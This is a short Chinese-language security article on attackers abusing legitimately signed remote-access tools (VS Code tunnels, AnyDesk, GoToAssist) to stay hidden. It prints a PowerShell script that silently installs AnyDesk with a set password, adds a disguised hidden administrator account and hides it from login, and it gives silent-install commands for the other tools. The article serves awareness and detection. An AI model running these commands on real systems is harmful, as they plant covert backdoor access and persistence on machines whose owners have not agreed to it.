攻击对抗日益激烈的局势下，安全产品的围追堵截使得攻击者将目光逐渐转向合法工具的滥用。通过使用具有合法签名的应用程序进行访问控制可以有效提高攻击隐匿性，也对防守及检测提出新的挑战。本文以Vscode、AnyDesk、GotoAssist为例探索攻击者用于访问控制的一些合法程序。

code.exe tunnel --accept-server-license-terms --no-sleep --random-name

Function AnyDesk { 
    mkdir "C:\ProgramData\AnyDesk"     # Download AnyDesk     $clnt = new-object System.Net.WebClient     $url = "http://download.anydesk.com/AnyDesk.exe"     $file = "C:\ProgramData\AnyDesk.exe"     $clnt.DownloadFile($url,$file) 
    cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent      cmd.exe /c echo b4ouDLG9trr | C:\ProgramData\anydesk.exe --set-password      net user WDAGUtilltyAccount "qv69t4p#Z0kE3" /add     net localgroup Administrators WDAGUtilltyAccount /ADD     reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v WDAGUtilltyAccount /t REG_DWORD /d 0 /f 
    cmd.exe /c C:\ProgramData\AnyDesk.exe --get-id     }

因为AnyDesk的局限性以及隐蔽性问题，攻击者开始把目光转移到新型云平台远控软件，以GotoAssist为例，其便于安装的客户端，以及安装后自带的服务自启动，使得攻击者可以更隐蔽的进行渗透。

下载无人值守模式安装程序后，通过MSIEXEC进行静默安装后，可以使用web端直接连接：

msiexec /i GoToAssist_Remote_Support_Unattended.msi /quiet